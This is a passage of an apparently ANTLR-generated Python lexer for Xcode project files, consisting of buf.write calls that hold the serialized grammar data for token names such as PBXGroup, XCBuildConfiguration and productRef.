buf.write("\7g\2\2\u01ab\32\3\2\2\2\u01ac\u01ad\7R\2\2\u01ad\u01ae")
buf.write("\7D\2\2\u01ae\u01af\7Z\2\2\u01af\u01b0\7I\2\2\u01b0\u01b1")
buf.write("\7t\2\2\u01b1\u01b2\7q\2\2\u01b2\u01b3\7w\2\2\u01b3\u01b4")
buf.write("\7r\2\2\u01b4\34\3\2\2\2\u01b5\u01b6\7R\2\2\u01b6\u01b7")
buf.write("\7D\2\2\u01b7\u01b8\7Z\2\2\u01b8\u01b9\7J\2\2\u01b9\u01ba")
buf.write("\7g\2\2\u01ba\u01bb\7c\2\2\u01bb\u01bc\7f\2\2\u01bc\u01bd")
buf.write("\7g\2\2\u01bd\u01be\7t\2\2\u01be\u01bf\7u\2\2\u01bf\u01c0")
buf.write("\7D\2\2\u01c0\u01c1\7w\2\2\u01c1\u01c2\7k\2\2\u01c2\u01c3")
buf.write("\7n\2\2\u01c3\u01c4\7f\2\2\u01c4\u01c5\7R\2\2\u01c5\u01c6")
buf.write("\7j\2\2\u01c6\u01c7\7c\2\2\u01c7\u01c8\7u\2\2\u01c8\u01c9")
buf.write("\7g\2\2\u01c9\36\3\2\2\2\u01ca\u01cb\7R\2\2\u01cb\u01cc")
buf.write("\7D\2\2\u01cc\u01cd\7Z\2\2\u01cd\u01ce\7P\2\2\u01ce\u01cf")
buf.write("\7c\2\2\u01cf\u01d0\7v\2\2\u01d0\u01d1\7k\2\2\u01d1\u01d2")
buf.write("\7x\2\2\u01d2\u01d3\7g\2\2\u01d3\u01d4\7V\2\2\u01d4\u01d5")
buf.write("\7c\2\2\u01d5\u01d6\7t\2\2\u01d6\u01d7\7i\2\2\u01d7\u01d8")
buf.write("\7g\2\2\u01d8\u01d9\7v\2\2\u01d9 \3\2\2\2\u01da\u01db")
buf.write("\7R\2\2\u01db\u01dc\7D\2\2\u01dc\u01dd\7Z\2\2\u01dd\u01de")
buf.write("\7R\2\2\u01de\u01df\7t\2\2\u01df\u01e0\7q\2\2\u01e0\u01e1")
buf.write("\7l\2\2\u01e1\u01e2\7g\2\2\u01e2\u01e3\7e\2\2\u01e3\u01e4")
buf.write("\7v\2\2\u01e4\"\3\2\2\2\u01e5\u01e6\7R\2\2\u01e6\u01e7")
buf.write("\7D\2\2\u01e7\u01e8\7Z\2\2\u01e8\u01e9\7T\2\2\u01e9\u01ea")
buf.write("\7g\2\2\u01ea\u01eb\7h\2\2\u01eb\u01ec\7g\2\2\u01ec\u01ed")
buf.write("\7t\2\2\u01ed\u01ee\7g\2\2\u01ee\u01ef\7p\2\2\u01ef\u01f0")
buf.write("\7e\2\2\u01f0\u01f1\7g\2\2\u01f1\u01f2\7R\2\2\u01f2\u01f3")
buf.write("\7t\2\2\u01f3\u01f4\7q\2\2\u01f4\u01f5\7z\2\2\u01f5\u01f6")
buf.write("\7{\2\2\u01f6$\3\2\2\2\u01f7\u01f8\7R\2\2\u01f8\u01f9")
buf.write("\7D\2\2\u01f9\u01fa\7Z\2\2\u01fa\u01fb\7T\2\2\u01fb\u01fc")
buf.write("\7g\2\2\u01fc\u01fd\7u\2\2\u01fd\u01fe\7q\2\2\u01fe\u01ff")
buf.write("\7w\2\2\u01ff\u0200\7t\2\2\u0200\u0201\7e\2\2\u0201\u0202")
buf.write("\7g\2\2\u0202\u0203\7u\2\2\u0203\u0204\7D\2\2\u0204\u0205")
buf.write("\7w\2\2\u0205\u0206\7k\2\2\u0206\u0207\7n\2\2\u0207\u0208")
buf.write("\7f\2\2\u0208\u0209\7R\2\2\u0209\u020a\7j\2\2\u020a\u020b")
buf.write("\7c\2\2\u020b\u020c\7u\2\2\u020c\u020d\7g\2\2\u020d&\3")
buf.write("\2\2\2\u020e\u020f\7R\2\2\u020f\u0210\7D\2\2\u0210\u0211")
buf.write("\7Z\2\2\u0211\u0212\7U\2\2\u0212\u0213\7j\2\2\u0213\u0214")
buf.write("\7g\2\2\u0214\u0215\7n\2\2\u0215\u0216\7n\2\2\u0216\u0217")
buf.write("\7U\2\2\u0217\u0218\7e\2\2\u0218\u0219\7t\2\2\u0219\u021a")
buf.write("\7k\2\2\u021a\u021b\7r\2\2\u021b\u021c\7v\2\2\u021c\u021d")
buf.write("\7D\2\2\u021d\u021e\7w\2\2\u021e\u021f\7k\2\2\u021f\u0220")
buf.write("\7n\2\2\u0220\u0221\7f\2\2\u0221\u0222\7R\2\2\u0222\u0223")
buf.write("\7j\2\2\u0223\u0224\7c\2\2\u0224\u0225\7u\2\2\u0225\u0226")
buf.write("\7g\2\2\u0226(\3\2\2\2\u0227\u0228\7R\2\2\u0228\u0229")
buf.write("\7D\2\2\u0229\u022a\7Z\2\2\u022a\u022b\7U\2\2\u022b\u022c")
buf.write("\7q\2\2\u022c\u022d\7w\2\2\u022d\u022e\7t\2\2\u022e\u022f")
buf.write("\7e\2\2\u022f\u0230\7g\2\2\u0230\u0231\7u\2\2\u0231\u0232")
buf.write("\7D\2\2\u0232\u0233\7w\2\2\u0233\u0234\7k\2\2\u0234\u0235")
buf.write("\7n\2\2\u0235\u0236\7f\2\2\u0236\u0237\7R\2\2\u0237\u0238")
buf.write("\7j\2\2\u0238\u0239\7c\2\2\u0239\u023a\7u\2\2\u023a\u023b")
buf.write("\7g\2\2\u023b*\3\2\2\2\u023c\u023d\7R\2\2\u023d\u023e")
buf.write("\7D\2\2\u023e\u023f\7Z\2\2\u023f\u0240\7V\2\2\u0240\u0241")
buf.write("\7c\2\2\u0241\u0242\7t\2\2\u0242\u0243\7i\2\2\u0243\u0244")
buf.write("\7g\2\2\u0244\u0245\7v\2\2\u0245\u0246\7F\2\2\u0246\u0247")
buf.write("\7g\2\2\u0247\u0248\7r\2\2\u0248\u0249\7g\2\2\u0249\u024a")
buf.write("\7p\2\2\u024a\u024b\7f\2\2\u024b\u024c\7g\2\2\u024c\u024d")
buf.write("\7p\2\2\u024d\u024e\7e\2\2\u024e\u024f\7{\2\2\u024f,\3")
buf.write("\2\2\2\u0250\u0251\7R\2\2\u0251\u0252\7D\2\2\u0252\u0253")
buf.write("\7Z\2\2\u0253\u0254\7X\2\2\u0254\u0255\7c\2\2\u0255\u0256")
buf.write("\7t\2\2\u0256\u0257\7k\2\2\u0257\u0258\7c\2\2\u0258\u0259")
buf.write("\7p\2\2\u0259\u025a\7v\2\2\u025a\u025b\7I\2\2\u025b\u025c")
buf.write("\7t\2\2\u025c\u025d\7q\2\2\u025d\u025e\7w\2\2\u025e\u025f")
buf.write("\7r\2\2\u025f.\3\2\2\2\u0260\u0261\7Z\2\2\u0261\u0262")
buf.write("\7E\2\2\u0262\u0263\7D\2\2\u0263\u0264\7w\2\2\u0264\u0265")
buf.write("\7k\2\2\u0265\u0266\7n\2\2\u0266\u0267\7f\2\2\u0267\u0268")
buf.write("\7E\2\2\u0268\u0269\7q\2\2\u0269\u026a\7p\2\2\u026a\u026b")
buf.write("\7h\2\2\u026b\u026c\7k\2\2\u026c\u026d\7i\2\2\u026d\u026e")
buf.write("\7w\2\2\u026e\u026f\7t\2\2\u026f\u0270\7c\2\2\u0270\u0271")
buf.write("\7v\2\2\u0271\u0272\7k\2\2\u0272\u0273\7q\2\2\u0273\u0274")
buf.write("\7p\2\2\u0274\60\3\2\2\2\u0275\u0276\7Z\2\2\u0276\u0277")
buf.write("\7E\2\2\u0277\u0278\7E\2\2\u0278\u0279\7q\2\2\u0279\u027a")
buf.write("\7p\2\2\u027a\u027b\7h\2\2\u027b\u027c\7k\2\2\u027c\u027d")
buf.write("\7i\2\2\u027d\u027e\7w\2\2\u027e\u027f\7t\2\2\u027f\u0280")
buf.write("\7c\2\2\u0280\u0281\7v\2\2\u0281\u0282\7k\2\2\u0282\u0283")
buf.write("\7q\2\2\u0283\u0284\7p\2\2\u0284\u0285\7N\2\2\u0285\u0286")
buf.write("\7k\2\2\u0286\u0287\7u\2\2\u0287\u0288\7v\2\2\u0288\62")
buf.write("\3\2\2\2\u0289\u028a\7Z\2\2\u028a\u028b\7E\2\2\u028b\u028c")
buf.write("\7T\2\2\u028c\u028d\7g\2\2\u028d\u028e\7o\2\2\u028e\u028f")
buf.write("\7q\2\2\u028f\u0290\7v\2\2\u0290\u0291\7g\2\2\u0291\u0292")
buf.write("\7U\2\2\u0292\u0293\7y\2\2\u0293\u0294\7k\2\2\u0294\u0295")
buf.write("\7h\2\2\u0295\u0296\7v\2\2\u0296\u0297\7R\2\2\u0297\u0298")
buf.write("\7c\2\2\u0298\u0299\7e\2\2\u0299\u029a\7m\2\2\u029a\u029b")
buf.write("\7c\2\2\u029b\u029c\7i\2\2\u029c\u029d\7g\2\2\u029d\u029e")
buf.write("\7T\2\2\u029e\u029f\7g\2\2\u029f\u02a0\7h\2\2\u02a0\u02a1")
buf.write("\7g\2\2\u02a1\u02a2\7t\2\2\u02a2\u02a3\7g\2\2\u02a3\u02a4")
buf.write("\7p\2\2\u02a4\u02a5\7e\2\2\u02a5\u02a6\7g\2\2\u02a6\64")
buf.write("\3\2\2\2\u02a7\u02a8\7Z\2\2\u02a8\u02a9\7E\2\2\u02a9\u02aa")
buf.write("\7U\2\2\u02aa\u02ab\7y\2\2\u02ab\u02ac\7k\2\2\u02ac\u02ad")
buf.write("\7h\2\2\u02ad\u02ae\7v\2\2\u02ae\u02af\7R\2\2\u02af\u02b0")
buf.write("\7c\2\2\u02b0\u02b1\7e\2\2\u02b1\u02b2\7m\2\2\u02b2\u02b3")
buf.write("\7c\2\2\u02b3\u02b4\7i\2\2\u02b4\u02b5\7g\2\2\u02b5\u02b6")
buf.write("\7R\2\2\u02b6\u02b7\7t\2\2\u02b7\u02b8\7q\2\2\u02b8\u02b9")
buf.write("\7f\2\2\u02b9\u02ba\7w\2\2\u02ba\u02bb\7e\2\2\u02bb\u02bc")
buf.write("\7v\2\2\u02bc\u02bd\7F\2\2\u02bd\u02be\7g\2\2\u02be\u02bf")
buf.write("\7r\2\2\u02bf\u02c0\7g\2\2\u02c0\u02c1\7p\2\2\u02c1\u02c2")
buf.write("\7f\2\2\u02c2\u02c3\7g\2\2\u02c3\u02c4\7p\2\2\u02c4\u02c5")
buf.write("\7e\2\2\u02c5\u02c6\7{\2\2\u02c6\66\3\2\2\2\u02c7\u02c8")
buf.write("\7Z\2\2\u02c8\u02c9\7E\2\2\u02c9\u02ca\7X\2\2\u02ca\u02cb")
buf.write("\7g\2\2\u02cb\u02cc\7t\2\2\u02cc\u02cd\7u\2\2\u02cd\u02ce")
buf.write("\7k\2\2\u02ce\u02cf\7q\2\2\u02cf\u02d0\7p\2\2\u02d0\u02d1")
buf.write("\7I\2\2\u02d1\u02d2\7t\2\2\u02d2\u02d3\7q\2\2\u02d3\u02d4")
buf.write("\7w\2\2\u02d4\u02d5\7r\2\2\u02d58\3\2\2\2\u02d6\u02d7")
buf.write("\7h\2\2\u02d7\u02d8\7k\2\2\u02d8\u02d9\7n\2\2\u02d9\u02da")
buf.write("\7g\2\2\u02da\u02db\7T\2\2\u02db\u02dc\7g\2\2\u02dc\u02dd")
buf.write("\7h\2\2\u02dd:\3\2\2\2\u02de\u02df\7r\2\2\u02df\u02e0")
buf.write("\7t\2\2\u02e0\u02e1\7q\2\2\u02e1\u02e2\7f\2\2\u02e2\u02e3")
buf.write("\7w\2\2\u02e3\u02e4\7e\2\2\u02e4\u02e5\7v\2\2\u02e5\u02e6")
buf.write("\7T\2\2\u02e6\u02e7\7g\2\2\u02e7\u02e8\7h\2\2\u02e8<\3")
buf.write("\2\2\2\u02e9\u02ea\7e\2\2\u02ea\u02eb\7q\2\2\u02eb\u02ec")
buf.write("\7p\2\2\u02ec\u02ed\7v\2\2\u02ed\u02ee\7c\2\2\u02ee\u02ef")
buf.write("\7k\2\2\u02ef\u02f0\7p\2\2\u02f0\u02f1\7g\2\2\u02f1\u02f2")
buf.write("\7t\2\2\u02f2\u02f3\7R\2\2\u02f3\u02f4\7q\2\2\u02f4\u02f5")
buf.write("\7t\2\2\u02f5\u02f6\7v\2\2\u02f6\u02f7\7c\2\2\u02f7\u02f8")
buf.write("\7n\2\2\u02f8>\3\2\2\2\u02f9\u02fa\7r\2\2\u02fa\u02fb")
buf.write("\7t\2\2\u02fb\u02fc\7q\2\2\u02fc\u02fd\7z\2\2\u02fd\u02fe")
buf.write("\7{\2\2\u02fe\u02ff\7V\2\2\u02ff\u0300\7{\2\2\u0300\u0301")
buf.write("\7r\2\2\u0301\u0302\7g\2\2\u0302@\3\2\2\2\u0303\u0304")
buf.write("\7t\2\2\u0304\u0305\7g\2\2\u0305\u0306\7o\2\2\u0306\u0307")
buf.write("\7q\2\2\u0307\u0308\7v\2\2\u0308\u0309\7g\2\2\u0309\u030a")
buf.write("\7I\2\2\u030a\u030b\7n\2\2\u030b\u030c\7q\2\2\u030c\u030d")
buf.write("\7d\2\2\u030d\u030e\7c\2\2\u030e\u030f\7n\2\2\u030f\u0310")
buf.write("\7K\2\2\u0310\u0311\7F\2\2\u0311\u0312\7U\2\2\u0312\u0313")
buf.write("\7v\2\2\u0313\u0314\7t\2\2\u0314\u0315\7k\2\2\u0315\u0316")
buf.write("\7p\2\2\u0316\u0317\7i\2\2\u0317B\3\2\2\2\u0318\u0319")
buf.write("\7t\2\2\u0319\u031a\7g\2\2\u031a\u031b\7o\2\2\u031b\u031c")
buf.write("\7q\2\2\u031c\u031d\7v\2\2\u031d\u031e\7g\2\2\u031e\u031f")
buf.write("\7K\2\2\u031f\u0320\7p\2\2\u0320\u0321\7h\2\2\u0321\u0322")
buf.write("\7q\2\2\u0322D\3\2\2\2\u0323\u0324\7h\2\2\u0324\u0325")
buf.write("\7k\2\2\u0325\u0326\7n\2\2\u0326\u0327\7g\2\2\u0327\u0328")
buf.write("\7G\2\2\u0328\u0329\7p\2\2\u0329\u032a\7e\2\2\u032a\u032b")
buf.write("\7q\2\2\u032b\u032c\7f\2\2\u032c\u032d\7k\2\2\u032d\u032e")
buf.write("\7p\2\2\u032e\u032f\7i\2\2\u032fF\3\2\2\2\u0330\u0331")
buf.write("\7g\2\2\u0331\u0332\7z\2\2\u0332\u0333\7r\2\2\u0333\u0334")
buf.write("\7n\2\2\u0334\u0335\7k\2\2\u0335\u0336\7e\2\2\u0336\u0337")
buf.write("\7k\2\2\u0337\u0338\7v\2\2\u0338\u0339\7H\2\2\u0339\u033a")
buf.write("\7k\2\2\u033a\u033b\7n\2\2\u033b\u033c\7g\2\2\u033c\u033d")
buf.write("\7V\2\2\u033d\u033e\7{\2\2\u033e\u033f\7r\2\2\u033f\u0340")
buf.write("\7g\2\2\u0340H\3\2\2\2\u0341\u0342\7n\2\2\u0342\u0343")
buf.write("\7c\2\2\u0343\u0344\7u\2\2\u0344\u0345\7v\2\2\u0345\u0346")
buf.write("\7M\2\2\u0346\u0347\7p\2\2\u0347\u0348\7q\2\2\u0348\u0349")
buf.write("\7y\2\2\u0349\u034a\7p\2\2\u034a\u034b\7H\2\2\u034b\u034c")
buf.write("\7k\2\2\u034c\u034d\7n\2\2\u034d\u034e\7g\2\2\u034e\u034f")
buf.write("\7V\2\2\u034f\u0350\7{\2\2\u0350\u0351\7r\2\2\u0351\u0352")
buf.write("\7g\2\2\u0352J\3\2\2\2\u0353\u0354\7k\2\2\u0354\u0355")
buf.write("\7p\2\2\u0355\u0356\7e\2\2\u0356\u0357\7n\2\2\u0357\u0358")
buf.write("\7w\2\2\u0358\u0359\7f\2\2\u0359\u035a\7g\2\2\u035a\u035b")
buf.write("\7K\2\2\u035b\u035c\7p\2\2\u035c\u035d\7K\2\2\u035d\u035e")
buf.write("\7p\2\2\u035e\u035f\7f\2\2\u035f\u0360\7g\2\2\u0360\u0361")
buf.write("\7z\2\2\u0361L\3\2\2\2\u0362\u0363\7k\2\2\u0363\u0364")
buf.write("\7p\2\2\u0364\u0365\7f\2\2\u0365\u0366\7g\2\2\u0366\u0367")
buf.write("\7p\2\2\u0367\u0368\7v\2\2\u0368\u0369\7Y\2\2\u0369\u036a")
buf.write("\7k\2\2\u036a\u036b\7f\2\2\u036b\u036c\7v\2\2\u036c\u036d")
buf.write("\7j\2\2\u036dN\3\2\2\2\u036e\u036f\7v\2\2\u036f\u0370")
buf.write("\7c\2\2\u0370\u0371\7d\2\2\u0371\u0372\7Y\2\2\u0372\u0373")
buf.write("\7k\2\2\u0373\u0374\7f\2\2\u0374\u0375\7v\2\2\u0375\u0376")
buf.write("\7j\2\2\u0376P\3\2\2\2\u0377\u0378\7w\2\2\u0378\u0379")
buf.write("\7u\2\2\u0379\u037a\7g\2\2\u037a\u037b\7u\2\2\u037b\u037c")
buf.write("\7V\2\2\u037c\u037d\7c\2\2\u037d\u037e\7d\2\2\u037e\u037f")
buf.write("\7u\2\2\u037fR\3\2\2\2\u0380\u0381\7r\2\2\u0381\u0382")
buf.write("\7n\2\2\u0382\u0383\7c\2\2\u0383\u0384\7v\2\2\u0384\u0385")
buf.write("\7h\2\2\u0385\u0386\7q\2\2\u0386\u0387\7t\2\2\u0387\u0388")
buf.write("\7o\2\2\u0388\u0389\7H\2\2\u0389\u038a\7k\2\2\u038a\u038b")
buf.write("\7n\2\2\u038b\u038c\7v\2\2\u038c\u038d\7g\2\2\u038d\u038e")
buf.write("\7t\2\2\u038eT\3\2\2\2\u038f\u0390\7e\2\2\u0390\u0391")
buf.write("\7j\2\2\u0391\u0392\7k\2\2\u0392\u0393\7n\2\2\u0393\u0394")
buf.write("\7f\2\2\u0394\u0395\7t\2\2\u0395\u0396\7g\2\2\u0396\u0397")
buf.write("\7p\2\2\u0397V\3\2\2\2\u0398\u0399\7r\2\2\u0399\u039a")
buf.write("\7t\2\2\u039a\u039b\7q\2\2\u039b\u039c\7f\2\2\u039c\u039d")
buf.write("\7w\2\2\u039d\u039e\7e\2\2\u039e\u039f\7v\2\2\u039f\u03a0")
buf.write("\7K\2\2\u03a0\u03a1\7p\2\2\u03a1\u03a2\7u\2\2\u03a2\u03a3")
buf.write("\7v\2\2\u03a3\u03a4\7c\2\2\u03a4\u03a5\7n\2\2\u03a5\u03a6")
buf.write("\7n\2\2\u03a6\u03a7\7R\2\2\u03a7\u03a8\7c\2\2\u03a8\u03a9")
buf.write("\7v\2\2\u03a9\u03aa\7j\2\2\u03aaX\3\2\2\2\u03ab\u03ac")
buf.write("\7t\2\2\u03ac\u03ad\7g\2\2\u03ad\u03ae\7r\2\2\u03ae\u03af")
buf.write("\7q\2\2\u03af\u03b0\7u\2\2\u03b0\u03b1\7k\2\2\u03b1\u03b2")
buf.write("\7v\2\2\u03b2\u03b3\7q\2\2\u03b3\u03b4\7t\2\2\u03b4\u03b5")
buf.write("\7{\2\2\u03b5\u03b6\7W\2\2\u03b6\u03b7\7T\2\2\u03b7\u03b8")
buf.write("\7N\2\2\u03b8Z\3\2\2\2\u03b9\u03ba\7t\2\2\u03ba\u03bb")
buf.write("\7g\2\2\u03bb\u03bc\7s\2\2\u03bc\u03bd\7w\2\2\u03bd\u03be")
buf.write("\7k\2\2\u03be\u03bf\7t\2\2\u03bf\u03c0\7g\2\2\u03c0\u03c1")
buf.write("\7o\2\2\u03c1\u03c2\7g\2\2\u03c2\u03c3\7p\2\2\u03c3\u03c4")
buf.write("\7v\2\2\u03c4\\\3\2\2\2\u03c5\u03c6\7r\2\2\u03c6\u03c7")
buf.write("\7c\2\2\u03c7\u03c8\7e\2\2\u03c8\u03c9\7m\2\2\u03c9\u03ca")
buf.write("\7c\2\2\u03ca\u03cb\7i\2\2\u03cb\u03cc\7g\2\2\u03cc^\3")
buf.write("\2\2\2\u03cd\u03ce\7r\2\2\u03ce\u03cf\7c\2\2\u03cf\u03d0")
buf.write("\7e\2\2\u03d0\u03d1\7m\2\2\u03d1\u03d2\7c\2\2\u03d2\u03d3")
buf.write("\7i\2\2\u03d3\u03d4\7g\2\2\u03d4\u03d5\7R\2\2\u03d5\u03d6")
buf.write("\7t\2\2\u03d6\u03d7\7q\2\2\u03d7\u03d8\7f\2\2\u03d8\u03d9")
buf.write("\7w\2\2\u03d9\u03da\7e\2\2\u03da\u03db\7v\2\2\u03db\u03dc")
buf.write("\7F\2\2\u03dc\u03dd\7g\2\2\u03dd\u03de\7r\2\2\u03de\u03df")
buf.write("\7g\2\2\u03df\u03e0\7p\2\2\u03e0\u03e1\7f\2\2\u03e1\u03e2")
buf.write("\7g\2\2\u03e2\u03e3\7p\2\2\u03e3\u03e4\7e\2\2\u03e4\u03e5")
buf.write("\7k\2\2\u03e5\u03e6\7g\2\2\u03e6\u03e7\7u\2\2\u03e7`\3")
buf.write("\2\2\2\u03e8\u03e9\7p\2\2\u03e9\u03ea\7c\2\2\u03ea\u03eb")
buf.write("\7o\2\2\u03eb\u03ec\7g\2\2\u03ecb\3\2\2\2\u03ed\u03ee")
buf.write("\7r\2\2\u03ee\u03ef\7c\2\2\u03ef\u03f0\7v\2\2\u03f0\u03f1")
buf.write("\7j\2\2\u03f1d\3\2\2\2\u03f2\u03f3\7u\2\2\u03f3\u03f4")
buf.write("\7q\2\2\u03f4\u03f5\7w\2\2\u03f5\u03f6\7t\2\2\u03f6\u03f7")
buf.write("\7e\2\2\u03f7\u03f8\7g\2\2\u03f8\u03f9\7V\2\2\u03f9\u03fa")
buf.write("\7t\2\2\u03fa\u03fb\7g\2\2\u03fb\u03fc\7g\2\2\u03fcf\3")
buf.write("\2\2\2\u03fd\u03fe\7d\2\2\u03fe\u03ff\7w\2\2\u03ff\u0400")
buf.write("\7k\2\2\u0400\u0401\7n\2\2\u0401\u0402\7f\2\2\u0402\u0403")
buf.write("\7C\2\2\u0403\u0404\7e\2\2\u0404\u0405\7v\2\2\u0405\u0406")
buf.write("\7k\2\2\u0406\u0407\7q\2\2\u0407\u0408\7p\2\2\u0408\u0409")
buf.write("\7O\2\2\u0409\u040a\7c\2\2\u040a\u040b\7u\2\2\u040b\u040c")
buf.write("\7m\2\2\u040ch\3\2\2\2\u040d\u040e\7h\2\2\u040e\u040f")
buf.write("\7k\2\2\u040f\u0410\7n\2\2\u0410\u0411\7g\2\2\u0411\u0412")
buf.write("\7u\2\2\u0412j\3\2\2\2\u0413\u0414\7t\2\2\u0414\u0415")
buf.write("\7w\2\2\u0415\u0416\7p\2\2\u0416\u0417\7Q\2\2\u0417\u0418")
buf.write("\7p\2\2\u0418\u0419\7n\2\2\u0419\u041a\7{\2\2\u041a\u041b")
buf.write("\7H\2\2\u041b\u041c\7q\2\2\u041c\u041d\7t\2\2\u041d\u041e")
buf.write("\7F\2\2\u041e\u041f\7g\2\2\u041f\u0420\7r\2\2\u0420\u0421")
buf.write("\7n\2\2\u0421\u0422\7q\2\2\u0422\u0423\7{\2\2\u0423\u0424")
buf.write("\7o\2\2\u0424\u0425\7g\2\2\u0425\u0426\7p\2\2\u0426\u0427")
buf.write("\7v\2\2\u0427\u0428\7R\2\2\u0428\u0429\7q\2\2\u0429\u042a")
buf.write("\7u\2\2\u042a\u042b\7v\2\2\u042b\u042c\7r\2\2\u042c\u042d")
buf.write("\7t\2\2\u042d\u042e\7q\2\2\u042e\u042f\7e\2\2\u042f\u0430")
buf.write("\7g\2\2\u0430\u0431\7u\2\2\u0431\u0432\7u\2\2\u0432\u0433")
buf.write("\7k\2\2\u0433\u0434\7p\2\2\u0434\u0435\7i\2\2\u0435l\3")
buf.write("\2\2\2\u0436\u0437\7*\2\2\u0437n\3\2\2\2\u0438\u0439\7")
buf.write(".\2\2\u0439p\3\2\2\2\u043a\u043b\7+\2\2\u043br\3\2\2\2")
buf.write("\u043c\u043d\7d\2\2\u043d\u043e\7w\2\2\u043e\u043f\7k")
buf.write("\2\2\u043f\u0440\7n\2\2\u0440\u0441\7f\2\2\u0441\u0442")
buf.write("\7E\2\2\u0442\u0443\7q\2\2\u0443\u0444\7p\2\2\u0444\u0445")
buf.write("\7h\2\2\u0445\u0446\7k\2\2\u0446\u0447\7i\2\2\u0447\u0448")
buf.write("\7w\2\2\u0448\u0449\7t\2\2\u0449\u044a\7c\2\2\u044a\u044b")
buf.write("\7v\2\2\u044b\u044c\7k\2\2\u044c\u044d\7q\2\2\u044d\u044e")
buf.write("\7p\2\2\u044e\u044f\7N\2\2\u044f\u0450\7k\2\2\u0450\u0451")
buf.write("\7u\2\2\u0451\u0452\7v\2\2\u0452t\3\2\2\2\u0453\u0454")
buf.write("\7d\2\2\u0454\u0455\7w\2\2\u0455\u0456\7k\2\2\u0456\u0457")
buf.write("\7n\2\2\u0457\u0458\7f\2\2\u0458\u0459\7R\2\2\u0459\u045a")
buf.write("\7j\2\2\u045a\u045b\7c\2\2\u045b\u045c\7u\2\2\u045c\u045d")
buf.write("\7g\2\2\u045d\u045e\7u\2\2\u045ev\3\2\2\2\u045f\u0460")
buf.write("\7d\2\2\u0460\u0461\7w\2\2\u0461\u0462\7k\2\2\u0462\u0463")
buf.write("\7n\2\2\u0463\u0464\7f\2\2\u0464\u0465\7T\2\2\u0465\u0466")
buf.write("\7w\2\2\u0466\u0467\7n\2\2\u0467\u0468\7g\2\2\u0468\u0469")
buf.write("\7u\2\2\u0469x\3\2\2\2\u046a\u046b\7f\2\2\u046b\u046c")
buf.write("\7g\2\2\u046c\u046d\7r\2\2\u046d\u046e\7g\2\2\u046e\u046f")
buf.write("\7p\2\2\u046f\u0470\7f\2\2\u0470\u0471\7g\2\2\u0471\u0472")
buf.write("\7p\2\2\u0472\u0473\7e\2\2\u0473\u0474\7k\2\2\u0474\u0475")
buf.write("\7g\2\2\u0475\u0476\7u\2\2\u0476z\3\2\2\2\u0477\u0478")
buf.write("\7r\2\2\u0478\u0479\7t\2\2\u0479\u047a\7q\2\2\u047a\u047b")
buf.write("\7f\2\2\u047b\u047c\7w\2\2\u047c\u047d\7e\2\2\u047d\u047e")
buf.write("\7v\2\2\u047e\u047f\7P\2\2\u047f\u0480\7c\2\2\u0480\u0481")
buf.write("\7o\2\2\u0481\u0482\7g\2\2\u0482|\3\2\2\2\u0483\u0484")
buf.write("\7r\2\2\u0484\u0485\7t\2\2\u0485\u0486\7q\2\2\u0486\u0487")
buf.write("\7f\2\2\u0487\u0488\7w\2\2\u0488\u0489\7e\2\2\u0489\u048a")
buf.write("\7v\2\2\u048a\u048b\7T\2\2\u048b\u048c\7g\2\2\u048c\u048d")
buf.write("\7h\2\2\u048d\u048e\7g\2\2\u048e\u048f\7t\2\2\u048f\u0490")
buf.write("\7g\2\2\u0490\u0491\7p\2\2\u0491\u0492\7e\2\2\u0492\u0493")
buf.write("\7g\2\2\u0493~\3\2\2\2\u0494\u0495\7r\2\2\u0495\u0496")
buf.write("\7t\2\2\u0496\u0497\7q\2\2\u0497\u0498\7f\2\2\u0498\u0499")
buf.write("\7w\2\2\u0499\u049a\7e\2\2\u049a\u049b\7v\2\2\u049b\u049c")
buf.write("\7V\2\2\u049c\u049d\7{\2\2\u049d\u049e\7r\2\2\u049e\u049f")
buf.write("\7g\2\2\u049f\u0080\3\2\2\2\u04a0\u04a1\7n\2\2\u04a1\u04a2")
buf.write("\7k\2\2\u04a2\u04a3\7p\2\2\u04a3\u04a4\7g\2\2\u04a4\u04a5")
buf.write("\7G\2\2\u04a5\u04a6\7p\2\2\u04a6\u04a7\7f\2\2\u04a7\u04a8")
buf.write("\7k\2\2\u04a8\u04a9\7p\2\2\u04a9\u04aa\7i\2\2\u04aa\u0082")
buf.write("\3\2\2\2\u04ab\u04ac\7z\2\2\u04ac\u04ad\7e\2\2\u04ad\u04ae")
buf.write("\7N\2\2\u04ae\u04af\7c\2\2\u04af\u04b0\7p\2\2\u04b0\u04b1")
buf.write("\7i\2\2\u04b1\u04b2\7w\2\2\u04b2\u04b3\7c\2\2\u04b3\u04b4")
buf.write("\7i\2\2\u04b4\u04b5\7g\2\2\u04b5\u04b6\7U\2\2\u04b6\u04b7")
buf.write("\7r\2\2\u04b7\u04b8\7g\2\2\u04b8\u04b9\7e\2\2\u04b9\u04ba")
buf.write("\7k\2\2\u04ba\u04bb\7h\2\2\u04bb\u04bc\7k\2\2\u04bc\u04bd")
buf.write("\7e\2\2\u04bd\u04be\7c\2\2\u04be\u04bf\7v\2\2\u04bf\u04c0")
buf.write("\7k\2\2\u04c0\u04c1\7q\2\2\u04c1\u04c2\7p\2\2\u04c2\u04c3")
buf.write("\7K\2\2\u04c3\u04c4\7f\2\2\u04c4\u04c5\7g\2\2\u04c5\u04c6")
buf.write("\7p\2\2\u04c6\u04c7\7v\2\2\u04c7\u04c8\7k\2\2\u04c8\u04c9")
buf.write("\7h\2\2\u04c9\u04ca\7k\2\2\u04ca\u04cb\7g\2\2\u04cb\u04cc")
buf.write("\7t\2\2\u04cc\u0084\3\2\2\2\u04cd\u04ce\7r\2\2\u04ce\u04cf")
buf.write("\7n\2\2\u04cf\u04d0\7k\2\2\u04d0\u04d1\7u\2\2\u04d1\u04d2")
buf.write("\7v\2\2\u04d2\u04d3\7U\2\2\u04d3\u04d4\7v\2\2\u04d4\u04d5")
buf.write("\7t\2\2\u04d5\u04d6\7w\2\2\u04d6\u04d7\7e\2\2\u04d7\u04d8")
buf.write("\7v\2\2\u04d8\u04d9\7w\2\2\u04d9\u04da\7t\2\2\u04da\u04db")
buf.write("\7g\2\2\u04db\u04dc\7F\2\2\u04dc\u04dd\7g\2\2\u04dd\u04de")
buf.write("\7h\2\2\u04de\u04df\7k\2\2\u04df\u04e0\7p\2\2\u04e0\u04e1")
buf.write("\7k\2\2\u04e1\u04e2\7v\2\2\u04e2\u04e3\7k\2\2\u04e3\u04e4")
buf.write("\7q\2\2\u04e4\u04e5\7p\2\2\u04e5\u04e6\7K\2\2\u04e6\u04e7")
buf.write("\7f\2\2\u04e7\u04e8\7g\2\2\u04e8\u04e9\7p\2\2\u04e9\u04ea")
